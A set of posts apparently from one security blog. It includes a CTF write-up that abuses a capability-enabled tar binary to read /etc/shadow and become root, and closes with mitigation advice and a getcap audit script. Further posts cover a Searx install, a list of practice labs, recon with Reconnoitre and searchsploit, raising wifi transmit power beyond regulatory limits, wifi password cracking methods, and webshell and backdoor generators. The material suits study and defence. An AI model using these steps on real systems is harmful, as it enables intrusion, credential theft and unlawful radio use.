Author: nxnjz

An Interesting Privilege Escalation vector (getcap/setcap)

Posted on August 21, 2018 - February 16, 2019 by nxnjz

Introduction

I recently came across an interesting way of escalating privileges on a GNU/Linux system during a CTF challenge. It involves file/process capabilities.

In Linux, files may be given specific capabilities. For example, if an executable needs to access (read) files that are only readable by root, it is possible to give that file this ‘permission’ without having it run with complete root privileges. This allows for a more secure system in general. For more info about this subject, click here.

getcap and setcap are used to view and set capabilities, respectively. On Debian and Debian-based distributions they are usually provided by the libcap2-bin package.

Privilege Escalation

We start by scanning the file system for files with capabilities using getcap -r / (the -r flag tells getcap to search recursively, and ‘/’ indicates that we want to search the whole system).

The output is usually filled with tens or hundreds of “Operation not supported” errors, making it hard to read. We can redirect errors to /dev/null to get a cleaner output.

nxnjz@test-machine:~$ getcap -r / 2>/dev/null
/home/nxnjz/tar = cap_dac_read_search+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep

An unusual finding: tar has the cap_dac_read_search capability, which bypasses the read permission check on files and the search permission check on directories. In other words, it has read access to anything. We could use this to read SSH keys, or /etc/shadow and get password hashes.

/etc/shadow is usually only readable by root:

nxnjz@test-machine:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

But since tar has that capability, we can archive /etc/shadow, extract it from the archive and read it.

nxnjz@test-machine:~$ ls
tar
nxnjz@test-machine:~$ ./tar -cvf shadow.tar /etc/shadow
./tar: Removing leading `/' from member names
/etc/shadow
nxnjz@test-machine:~$ ls
shadow.tar tar
nxnjz@test-machine:~$ ./tar -xvf shadow.tar
etc/shadow
nxnjz@test-machine:~$ ls
etc shadow.tar tar
nxnjz@test-machine:~$ cat etc/shadow
root:$1$xyz$Bf.3hZ4SmETM3A78n1nWr.:17735:0:99999:7:::
daemon:*:17729:0:99999:7:::
bin:*:17729:0:99999:7:::
sys:*:17729:0:99999:7:::
sync:*:17729:0:99999:7:::
games:*:17729:0:99999:7:::
man:*:17729:0:99999:7:::
lp:*:17729:0:99999:7:::
mail:*:17729:0:99999:7:::
news:*:17729:0:99999:7:::
uucp:*:17729:0:99999:7:::
proxy:*:17729:0:99999:7:::
nxnjz:$1$sTfA$SnnNO9Cflvs4aq4ZCU/6J/:17764:0:99999:7:::

After cracking that password hash for root, which turns out to be ‘root1234’, we can login using su:

nxnjz@test-machine:~$ su root
Password:
root@test-machine:/home/nxnjz# whoami
root
root@test-machine:/home/nxnjz#

Conclusion & Mitigation

This is simply an example of how capabilities can serve as a privilege escalation vector. Another very useful capability in a scenario like this would be cap_dac_override, which bypasses read, write and execute permission checks. This obviously could be used in various ways to escalate privileges, including but not limited to adding a root user to /etc/passwd or /etc/shadow, modifying cron jobs run by root, adding a public SSH key to /root/authorized_keys, or simply opening a root shell.

Keep in mind that the presence of a potentially exploitable capability does not guarantee privilege escalation. You’re still limited by the functionality of the executable in question.

That said, file capabilities are rarely used in the wild; system administrators rarely set or change them.

System administrators should make sure that no abusable or exploitable capabilities are assigned on their file systems, for example by reviewing the output of getcap -r / periodically. Capabilities are generally safer than SUID, but they may still pose a risk.
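As an added example (not code from this post), here is a small Python audit script that parses getcap output in the format shown above and reports the capabilities an administrator would want to explain or remove. The risky-capability list, the audit() helper and the sample lines are my own; the sample mixes the post's three findings with two constructed entries.

```python
import re

# Capabilities that matter most on a binary any local user can run (my own short list).
RISKY_CAPS = {
    "cap_dac_read_search": "bypasses read/search permission checks on any file",
    "cap_dac_override": "bypasses read, write and execute permission checks",
    "cap_setuid": "can switch to any UID, including 0",
    "cap_sys_admin": "broad administrative privileges (mounts, namespaces, ...)",
    "cap_sys_ptrace": "can trace and inject into other processes",
}
# One cap_to_text(3) clause: "cap_a,cap_b+ep", "cap_x=ep" or "=ep" (meaning all capabilities).
CLAUSE_RE = re.compile(r"^(?P<names>[a-z0-9_,]*)[+=-](?P<flags>[eip]*)$")

def parse_getcap_line(line):
    """Return (path, {cap_name: flags}) for one getcap line, or None if it is not one."""
    line = line.strip()
    # libcap before 2.41 prints "PATH = CLAUSES"; newer releases print "PATH CLAUSES".
    path, _, rest = line.partition(" = ") if " = " in line else line.rpartition(" ")
    caps = {}
    for clause in rest.split():
        m = CLAUSE_RE.match(clause)
        if not m:
            return None  # e.g. an "Operation not supported" error line
        for name in (m.group("names") or "all").split(","):
            caps[name] = m.group("flags")
    return path, caps

def assess(caps):
    """Return [(cap, reason)] for capabilities a process exec'ing the file actually receives."""
    findings = []
    for name, flags in caps.items():
        if "p" not in flags:
            continue  # inheritable-only: nothing is granted on exec
        if name == "all":
            findings.append((name, "every capability: effectively setuid root"))
        elif name in RISKY_CAPS:
            findings.append((name, RISKY_CAPS[name]))
    return findings

def audit(lines):
    """Map each flagged path to its findings; clean and unparsable lines are skipped."""
    report = {}
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed:
            findings = assess(parsed[1])
            if findings:
                report[parsed[0]] = findings
    return report

# Constructed sample: the three lines from the getcap run above plus two made-up entries
# (one in the newer libcap output format, one with an inheritable-only capability).
SAMPLE = """\
/home/nxnjz/tar = cap_dac_read_search+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/local/bin/backup-helper cap_dac_override=ep
/opt/tools/trace = cap_sys_ptrace+i
"""
```

On a real host, feed audit() the lines of getcap -r / 2>/dev/null instead of SAMPLE.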

Searx Installation in a Docker Container on CentOS 7

Posted on June 28, 2018 - May 16, 2020 by nxnjz

Introduction

Searx is a meta-search engine that collects and aggregates results from a multitude of search engines including Google, Bing, and DuckDuckGo. It is free and open-source, and does not track users or collect any data. It can be quickly installed on your own server. You can use an online instance of Searx here.

This article will guide you through the deployment of a Searx instance in a Docker container on CentOS 7.

Preparations

The following command will update your system:

yum update -y

Git and Docker are required for this install:

yum install -y docker git

Start the Docker daemon and enable it to start at boot:

systemctl start docker; systemctl enable docker

Searx installation

First, clone the official Searx github repository:

git clone https://github.com/asciimoo/searx.git

Go into the searx directory and build with docker:

cd searx/
docker build -t searx .

This will install dependencies and build the container.

Finally, start the newly created container:

docker run -d --name searx -p 8888:8888 -e IMAGE_PROXY=True searx

You should be able to access your searx engine by browsing to YOUR_SERVER_IP:8888

Further information

After a reboot, docker will start automatically (since we enabled that in systemd), but the searx container will not. To start it manually after a reboot, run docker start searx

You can monitor CPU time and memory used by searx using docker stats searx

To stop searx, run docker stop searx

If port 8888 is not accessible after following this article, add it to firewalld. The following command will work in most cases:

firewall-cmd --zone=public --permanent --add-port=8888/tcp
firewall-cmd --reload

List of security labs/challenges/CTFs

Posted on June 25, 2018 - May 4, 2020 by nxnjz

Listed below are some of the best websites and platforms where you can play hacking games, solve challenges, hack realistic systems and web applications, etc.

Metasploitable 2 (offline, free)

Metasploitable is a Linux virtual machine that you can download and set up on your system. It is vulnerable and exploitable in almost every way possible. Recommended for beginners. You can find the exploitability guide here.

Damn Vulnerable Web Application a.k.a DVWA (offline, free)

DVWA is a web app using PHP and MySQL that is extremely vulnerable. It is available both as a package that you can set up on your own web server, and as a full ISO file.

  • Download zip package (1.3MB, v1.9)
  • Download Live CD (480MB, v1.0.7)

HackTheBox.eu (online, free, optional VIP subscription)

Registration on HackTheBox requires you to ‘hack’ your way in. It is a simple task. If you find yourself unable to get the invite code by yourself, you will have a very hard time solving their challenges and hacking their boxes. Learn some more then try again.

  • Independent challenges : Reverse Engineering, Cryptography, Steganography, Web applications, and more.
  • Servers: From easily hackable in 2 hours to dozens of hours of nightmares.

OverTheWire.org (online, free)

You don’t need to register. Just choose a game (each game requires different skills) and try to progress through the levels. Most games are SSH based. Various levels of difficulty from very easy to extremely hard.

HackThisSite.org (online, free)

Different missions requiring different skillsets, each with multiple levels and varying difficulties. Registration is required and is straightforward.

VulnHub.com (offline, free)

VulnHub hosts a large number of virtual machines which you can download and run on your own system and try to hack them. The goal is to get root privileges on that virtual machine. Varying difficulty levels and required skillsets.

HackThis.co.uk (online, free)

This website offers challenges similar to those of hackthissite.org and hackthebox.eu. Registration is required.

Game Of Hacks (online, free)

You have to find the vulnerability in a piece of code, as quickly as possible.

Others

  • WebGoat (OWASP project), instructions and downloads here.
  • Damn Vulnerable iOS application.
  • Google Gruyere, a very vulnerable web application based online, no need to download anything.
  • PentesterLab.
  • W3Challs, online challenges.
  • bWAPP, another extremely vulnerable web app available for download, just the app or pre-installed on a VM.
  • Hell Bound Hackers.
  • ThisIsLegal, online challenges.
  • Hackme
  • HackerTest.net, 20 online challenges.

This post is constantly updated, more resources will be added.

Information Gathering and Exploit Finding with Reconnoitre and Exploit-DB

Posted on June 23, 2018 - August 20, 2018 by nxnjz

Basics

The first step in any penetration test (or hacking) engagement is gathering information. The first part of that step is, in real world scenarios, OSINT or Open Source Intelligence.

This post is not about OSINT; it is about direct information gathering from the target, service enumeration and fingerprinting, and exploit finding, with an open-source tool written in Python: Reconnoitre.

Requirements

  • Reconnoitre (I will walk you through the installation)
  • Python (Usually installed by default on Linux)
  • A target IP address (Most websites now run on shared hosting, so by targeting the IP address of a particular website, you’re most likely targeting a decent server with several websites and services.)
  • A working internet connection if the target is not on a private network.

Installing Reconnoitre

  1. From a terminal, run: git clone https://github.com/codingo/Reconnoitre.git  (You may also manually get the files from here)
  2. That’s it.

Usage

1. Navigate to the directory containing the python code:

cd Reconnoitre/reconnoitre/

2. Let’s take a quick look at the available options:

python reconnoitre.py -h

[Screenshot: Reconnoitre usage]

We obviously need -t to set the target or target range, -o to save all the results, and --services to scan for services.

We don’t need any other options for the default scan we’re gonna run.

So our command should be:

python reconnoitre.py --services -o [directory] -t [target-IP]

3. Start the scan with the command above.

[Screenshot: Reconnoitre partial output]

Reconnoitre will create a directory named after the target, in the specified output directory. It will then create 3 directories and 1 file inside it: loot, exploit, scans, and proof.txt. All results and findings will be written to those.

It will start with a quick nmap scan on the target, then a full TCP + UDP scan. The latter is especially useful when services are not running on the usual ports. The full scan will take a while.

[Screenshot: Reconnoitre output]

As you can see, the detailed scans didn’t find anything new, or so it seems.

4. Take a closer look at the findings:

Navigate to the newly created scans directory. You will find the outputs of 3 different scans: the quick scan, the full TCP scan, and the UDP scan. Each scan result is saved in three formats: XML, nmap (regular nmap output), and gnmap (greppable output). Take a look at each scan result; you will find detailed information including OS versions and service versions, useful for finding potential exploits.

5. Further scans/attacks: cat [target]_findings.txt

Depending on the results, Reconnoitre will suggest relevant scans and attacks for each found service, including but not limited to nmap NSE scans, fingerprinting scans and brute force attacks. That is very useful.

Exploit-DB

Exploit-DB is a well known database of around 40,000 exploits of various types as of August 2018. It also hosts shellcode and security papers. You can access it here.

Consider the following Nmap output:

PORT   STATE   SERVICE   VERSION
21/tcp open    ftp       vsftpd 2.3.4
Service Info: OS: Unix

We can see that it found vsftpd (a popular FTP server) running on port 21. It identified the version as 2.3.4. By looking up “vsftpd 2.3.4” on exploit-db, we find an exploit from 2011 that allows RCE. This means that we could obtain command-line access to this machine.

If you’re running Kali Linux, you can use ‘searchsploit’, a convenient CLI tool that allows you to search the exploit-db database from a terminal.

Usage is very simple, for example: searchsploit vsftpd 2.3.4
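An added example, not part of Reconnoitre or this post: a parser for the greppable .gnmap files left in the scans directory, which pulls every open port's service and version out of each Host line and turns them into the product-plus-version queries searchsploit expects, so you can triage which services on hosts you are responsible for have a public exploit and need patching first. The .gnmap text is constructed, and the helper names are mine.

```python
import re

# One "Host:" line of .gnmap output: address, optional name in parentheses, then tab-separated sections.
HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\t(?P<rest>.*)$")
# Product name (up to three words) followed by a version that starts with a digit.
PRODUCT_RE = re.compile(r"(?P<product>[A-Za-z][\w.-]*(?: [A-Za-z][\w.-]*){0,2})\s+(?P<ver>\d[\w.]*)")

def parse_gnmap(text):
    """Return a list of {ip, port, proto, service, version} for every open port in .gnmap text."""
    services = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # "# Nmap ..." comment lines and anything else
        sections = dict(s.split(": ", 1) for s in m.group("rest").split("\t") if ": " in s)
        for entry in sections.get("Ports", "").split(", "):
            # Entry layout: port/state/protocol/owner/service/rpc info/version/
            # (nmap writes "|" instead of "/" inside the version field, so splitting on "/" is safe).
            parts = entry.split("/")
            if len(parts) < 7 or parts[1] != "open":
                continue
            services.append({"ip": m.group("ip"), "port": int(parts[0]), "proto": parts[2],
                             "service": parts[4], "version": parts[6].strip()})
    return services

def searchsploit_queries(services):
    """Distinct 'product version' strings, e.g. 'vsftpd 2.3.4'; ports with no version are skipped."""
    queries = []
    for svc in services:
        m = PRODUCT_RE.match(svc["version"])  # drops banner noise such as "(protocol 2.0)"
        if m:
            query = f"{m.group('product')} {m.group('ver')}"
            if query not in queries:
                queries.append(query)
    return queries

# Constructed sample in the .gnmap layout; the vsftpd entry mirrors the nmap output above.
SAMPLE_GNMAP = (
    "# Nmap 7.70 scan initiated (constructed sample)\n"
    "Host: 192.0.2.10 ()\tStatus: Up\n"
    "Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)/, "
    "23/closed/tcp//telnet///\tIgnored State: filtered (997)\n"
)

if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_GNMAP)
    for svc in found:
        print(f"{svc['ip']}:{svc['port']}/{svc['proto']} {svc['service']} -> {svc['version']}")
    for query in searchsploit_queries(found):
        print("searchsploit", query)
```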

Increase the transmission power of a wifi card/adapter (txpower)

Posted on June 22, 2018 - June 25, 2018 by nxnjz

Introduction

This tutorial will take you through some simple steps to increase the transmission power (txpower) of a wireless card.

This is not necessary for hacking wifi, but will usually increase your success rate, especially for targets that are far from you.

802.11 transmission powers are regulated in almost all countries. Following this tutorial may cause you to go over these regulations.

Requirements

  • Linux
  • A compatible wireless card with compatible drivers. Not all cards allow for higher transmission power.
  • Basic command-line knowledge.
  • Tools (installed by default on kali and many distros)
    1. iw
    2. iwconfig
    3. ifconfig

Steps

1. Make sure your card is plugged in and working. You may run the following in a terminal to check:

iwconfig

You should see something like this:

My interface happens to be wlan1. Yours could be wlan0 or something else.

Look at the third line, Tx-Power=18 dBm, this is what we want to increase.

2. Next, we need to set the regulatory domain to one that allows higher transmission powers. On my system, ‘US’ allows me to go up to 30 dBm. If it doesn’t work for you, try ‘BO’ instead:

iw reg set US

or

iw reg set BO

3. Now run iw reg get and look for a line like the following:

(2402 - 2472 @ 40), (N/A, 30), (N/A)

This line indicates that we can now go up to 30 dBm on 2.4 GHz channels.

4. Now take the interface down with ifconfig:

ifconfig wlan1 down

You should get no output, unless errors occurred.

5. Set the txpower:

iwconfig wlan1 txpower 30

You should get no output.

6. Bring the interface up:

ifconfig wlan1 up

Again, no output.

7. Run iwconfig again to make sure everything worked:

As you can see, Tx-Power=30 dBm

Wifi

Posted on June 20, 2018 - August 20, 2018 by nxnjz

Basics

If you don’t know much about wireless networking, I highly recommend you read this introduction. And read this to learn the very basics of wifi security.

There are four main ways of obtaining a wifi password:

  1. WEP cracking.
  2. WPA/WPA2 wordlist/bruteforce attack.
  3. WPS bruteforce / Pixie Dust.
  4. Evil Twin Access Point. This involves social engineering.

What you should know before getting started

  • There are many compatibility issues between drivers, wifi chipsets, etc. You will need to choose a wifi card carefully if you want it to work.
  • Distance matters. The farther away a target is, the harder it is to successfully attack it. A more powerful wireless card with a high gain antenna is always helpful. Some wireless cards allow you to set their transmission power. Video Demo here.
  • Each target is different. You can’t expect something that works on a particular brand/model/firmware to work on any other brand/model/firmware. This is true for both access points and wifi cards.
  • A password is not always enough to gain access. For example, MAC filtering may still prevent you from connecting, even though you have the correct password. MAC spoofing can usually bypass that.
  • There are many, many tools available. Some will do everything for you automatically and may even have a nice graphical interface, others will require more skill and command-line knowledge. The latter group is more effective and flexible when employed successfully. The same goal can always be achieved using different tools.

Tutorials for Noobs

I will only list here popular methods using popular tools. If you’re familiar with the usual methods, skip this part.

Choose the one that suits you best.

WEP:

  • Using the aircrack-ng suite. (CLI)
  • Using besside-ng. This tool automates a few steps. (CLI)
  • Using Fern. (GUI)

WPA:

  • Using the aircrack-ng suite. (CLI)
  • Using Wifite. This tool automates many steps. (CLI)

WPS:

  • Using Reaver. (CLI)
  • Using Bully. (CLI)

WebShells

Posted on June 20, 2018 - August 20, 2018 by nxnjz

Basics

If you don’t understand what a shell is, click here.

A webshell is usually a web page that gives the user control over the operating system, usually via a command line.

Many webshells also provide a graphical interface for ease of use.

You should only use a webshell when more conventional access, like SSH or the almost obsolete Telnet, is not available.

Some may work better than others, some may not work at all depending on the security measures employed by the target.

Watch out for webshells that are backdoored. While webshells are usually considered backdoors themselves, many of them will “phone home”, letting someone (whoever put the backdoor in place, usually the developer) know that they have been executed. That person may then use the backdoor themselves for nefarious purposes. So make sure you look at the code before using a webshell, or look at the HTTP traffic generated upon execution of the file. The latter will not necessarily reveal a backdoor in your shell. The files listed below are from reputable sources only, so you may trust them.

WebShells

    • Laudanum at github: A collection of webshells in different languages.
    • Antak PowerShell Aspx: Simple and works very well.
    • WeBaCoo: Perl script for generating php backdoors, also allows to connect to a backdoor from your terminal for terminal-like access.
    • Weevely:  Powerful python script for generating backdoors, connecting to them, and running different modules to help with many tasks.
